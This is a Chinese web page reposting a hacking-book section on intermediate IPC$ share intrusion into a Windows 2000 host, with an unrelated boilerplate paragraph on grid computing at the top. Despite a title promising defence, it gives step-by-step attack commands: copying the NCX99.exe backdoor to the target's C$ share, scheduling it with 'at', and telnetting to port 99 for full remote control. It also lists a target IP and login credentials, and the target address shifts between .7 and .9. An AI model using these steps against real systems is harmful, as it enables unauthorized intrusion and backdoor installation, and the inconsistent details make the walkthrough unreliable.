网站首页/网络技术列表/内容

黑客攻防技术内幕-防范入侵的办法(2)

网络技术2022-04-28阅读
网络技术是从1990年代中期发展起来的新技术,它把互联网上分散的资源融为有机整体,实现资源的全面共享和有机协作,使人们能够透明地使用资源的整体能力并按需获取信息。资源包括高性能计算机、存储资源、数据资源、信息资源、知识资源、专家资源、大型数据库、网络、传感器等。 当前的互联网只限于信息共享,网络则被认为是互联网发展的第三阶段。
6.1 IPC$漏洞入侵(2)

    

6.1.2  基于IPC$中级入侵

6.1.1节我们了解了基于IPC$共享入侵的简单入侵,本小节结合上一小节内容来深入来了解一下基于IPC$共享的中级入侵。

1. 入侵测试目标:

测试主机:61.150.115.7(Windows2000)

用户名:System32(隶属Administrators)

口令:ffhh.net

2. 入侵测试所用程序:

      Windows NT下的:command.com

      Windows 2000下的:命令提示符(:cmd.exe)

      后门程序:NCX99.exe (用于远程登录到目标服务器的99号端口)

3. 入侵测试:

所用系统为:Windows 2000 Professional

例如,通过IPC$共享和远程61.150.115.7建立了远程连接(请参阅上一章节),所得到的是可以控制其硬盘读写操作,但是一个入侵者不会就此停手,还会进一步地控制目标机,接下来看看入侵者是如何完全控制目标机的。

(1) 在命令提示符下输入如下命令格式:

copy d:\hacker\ncx99.exe \\61.150.115.9\c$

命令解释:

将本地Dhacker文夹下的NCX99.exe程序复制到61.150.115.9C盘下。

输入完毕后按Enter键,等待几秒钟后将会显示文件已复制,如图6-14所示。

6-14  在命令提示符下向目标机复制文件

注:

这里也可以通过将目标机61.150.115.9中的C盘映射到本地盘,然后直接复制过去,如图6-15所示。

6-15  通过映射将ncx.exe程序复制到目标机

通过图6-16可以看到NCX.exe成功地添加到目标机的C盘下。

(2) 在命令提示符下输入如下命令格式:

net time \\61.150.115.9

6-16  NCX99.exe成功地被复制到目标机的C盘下

命令解释:

查看目标机61.150.115.9上的时间。

输入完毕后按Enter键,将会显示目标机现在的时间,如图6-17所示。

6-17  查看目标机上的时间

注:

屏幕上现在显示的时间是下午03:27,但是系统所采用的是24小时制,那么现在目标机上的时间就是15:27

(3) 在命令提示符下输入如下命令格式:

at \\61.150.115.9 15:29 c:\ncx99.exe

命令解释:

61.150.115.915:29时执行ncx99.exe程序,也就将ncx99.exe添加到目标机的计划任务中,让它在15:29时自动运行。

输入完毕后按Enter键,将出现新加了一项作业的字样,如图6-18所示。

6-18  添加计划任务

注意:

通过net time \\61.150.115.9得知目标服务器上的时间是15:27,但在添加计划任务时将时间设为15:29,这是因为本地到远程传输时需一定的时间,为了确保NCX99.exe的运行,因此将计划执行的时间向后推2分钟。在这里也可以通过如下命令查看计划是否被添加:

at \\61.150.115.9

命令解释:

查看目标机计划任务列表输入完毕后,按Enter键即可看到如图6-19所示,计划被成功添加。

6-19  查看目标机计划任务列表

(4) 2分钟后,在命令提示符下输入如下命令格式:

telnet 61.150.115.9 99

则如图6-20所示的画面。

6-20  通过99号端口远程登录到目标机

命令解释:

目标服务器执行NCX99.exe后,就会在本机开启一个99号端口,用于远程登录。

命令输入完毕后按下Enter键,即可远程登录到目标机,如图6-21所示。

6-21  远程登录到目标机

此时已完全控制了目标机。

(5) 入侵检测成功完成!



网络的神奇作用吸引着越来越多的用户加入其中,正因如此,网络的承受能力也面临着越来越严峻的考验―从硬件上、软件上、所用标准上......,各项技术都需要适时应势,对应发展,这正是网络迅速走向进步的催化剂。

……

相关阅读